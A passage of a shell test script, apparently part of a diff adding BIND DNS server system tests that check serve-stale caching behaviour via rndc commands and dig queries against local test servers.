dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale off' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale off || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: off (rndc) (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (serve-stale off) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Test enabling serve-stale via rndc. +# +n=$((n+1)) +echo_i "running 'rndc serve-stale on' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale on || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (serve-stale on) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (serve-stale on) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*4.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (serve-stale on) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (serve-stale on) ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale off' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale off || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale reset' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale reset || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (serve-stale reset) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (serve-stale reset) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype.example\..*4.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (serve-stale reset) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (serve-stale reset) ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc serve-stale off' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale off || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: off (rndc) (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Update named.conf. +# Test server with low max-stale-ttl. +# +echo_i "test server with serve-stale options set, low max-stale-ttl" + +n=$((n+1)) +echo_i "updating ns1/named.conf ($n)" +ret=0 +copy_setports ns1/named2.conf.in ns1/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns1 10.53.0.1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: off (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "flush cache, re-enable serve-stale and query again ($n)" +ret=0 +$RNDCCMD 10.53.0.1 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +$RNDCCMD 10.53.0.1 serve-stale on > rndc.out.test$n.2 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache longttl.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT (low max-stale-ttl) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Keep track of time so we can access these RRset later, when we expect them +# to become ancient. +t1=`$PERL -e 'print time()'` + +n=$((n+1)) +echo_i "verify prime cache statistics (low max-stale-ttl) ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After prime queries, we expect +# two active TXT RRsets, one active Others, one nxrrset TXT, and one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "2 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT (low max-stale-ttl) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (low max-stale-ttl) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*3.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (low max-stale-ttl) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (low max-stale-ttl) ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify stale cache statistics (low max-stale-ttl) ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After serve-stale queries, we +# expect one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one +# stale NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "1 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #!TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 + +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +# Retrieve max-stale-ttl value. +interval_to_ancient=`grep 'max-stale-ttl' ns1/named2.conf.in | awk '{ print $2 }' | tr -d ';'` +# We add 2 seconds to it since this is the ttl value of the records being +# tested. +interval_to_ancient=$((interval_to_ancient + 2)) +t2=`$PERL -e 'print time()'` +elapsed=$((t2 - t1)) + +# If elapsed time so far is less than max-stale-ttl + 2 seconds, then we sleep +# enough to ensure that we'll ask for ancient RRsets in the next queries. +if [ $elapsed -lt $interval_to_ancient ]; then + sleep $((interval_to_ancient - elapsed)) +fi + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check ancient data.example TXT (low max-stale-ttl) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check ancient othertype.example CAA (low max-stale-ttl) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check ancient nodata.example TXT (low max-stale-ttl) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check ancient nxdomain.example TXT (low max-stale-ttl) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Test stale-refresh-time when serve-stale is enabled via rndc. +# Steps for testing stale-refresh-time option (default). +# 1. Prime cache data.example txt +# 2. Disable responses from authoritative server. +# 3. Sleep for TTL duration so rrset TTL expires (2 sec) +# 4. Query data.example +# 5. Check if response come from stale rrset (3 sec TTL) +# 6. Enable responses from authoritative server. +# 7. Query data.example +# 8. Check if response come from stale rrset, since the query +# is within stale-refresh-time window. +n=$((n+1)) +echo_i "flush cache, enable responses from authoritative server ($n)" +ret=0 +$RNDCCMD 10.53.0.1 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 1. +n=$((n+1)) +echo_i "prime cache data.example TXT (stale-refresh-time rndc) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 2. +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 3. +sleep 2 + +# Step 4. +n=$((n+1)) +echo_i "sending query for test ($n)" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n + +# Step 5. +echo_i "check stale data.example TXT (stale-refresh-time rndc) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 6. +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 7. +echo_i "sending query for test $((n+1))" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) + +# Step 8. +n=$((n+1)) +echo_i "check stale data.example TXT comes from cache (stale-refresh-time rndc) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Steps for testing stale-refresh-time option (disabled). +# 1. Prime cache data.example txt +# 2. Disable responses from authoritative server. +# 3. Sleep for TTL duration so rrset TTL expires (2 sec) +# 4. Query data.example +# 5. Check if response come from stale rrset (3 sec TTL) +# 6. Enable responses from authoritative server. +# 7. Query data.example +# 8. Check if response come from stale rrset, since the query +# is within stale-refresh-time window. +n=$((n+1)) +echo_i "updating ns1/named.conf ($n)" +ret=0 +copy_setports ns1/named3.conf.in ns1/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns1 10.53.0.1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (rndc) (stale-answer-ttl=3 max-stale-ttl=20 stale-refresh-time=0)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "flush cache, enable responses from authoritative server ($n)" +ret=0 +$RNDCCMD 10.53.0.1 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 1. +n=$((n+1)) +echo_i "prime cache data.example TXT (stale-refresh-time disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 2. +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 3. +sleep 2 + +# Step 4. +n=$((n+1)) +echo_i "sending query for test ($n)" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n + +# Step 5. +echo_i "check stale data.example TXT (stale-refresh-time disabled) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 6. +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 7. +echo_i "sending query for test $((n+1))" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) + +# Step 8. +n=$((n+1)) +echo_i "check data.example TXT comes from authoritative (stale-refresh-time disabled) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Now test server with no serve-stale options set. +# +echo_i "test server with no serve-stale options set" + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache longttl.example TXT (max-stale-ttl default) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT (max-stale-ttl default) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA (max-stale-ttl default) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*2.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (max-stale-ttl default) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT (max-stale-ttl default) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify prime cache statistics (max-stale-ttl default) ($n)" +ret=0 +rm -f ns3/named.stats +$RNDCCMD 10.53.0.3 stats > /dev/null 2>&1 +[ -f ns3/named.stats ] || ret=1 +cp ns3/named.stats ns3/named.stats.$n +# Check first 10 lines of Cache DB statistics. After prime queries, we expect +# two active TXT RRsets, one active Others, one nxrrset TXT, and one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns3/named.stats.$n > ns3/named.stats.$n.cachedb || ret=1 +grep "2 TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 Others" 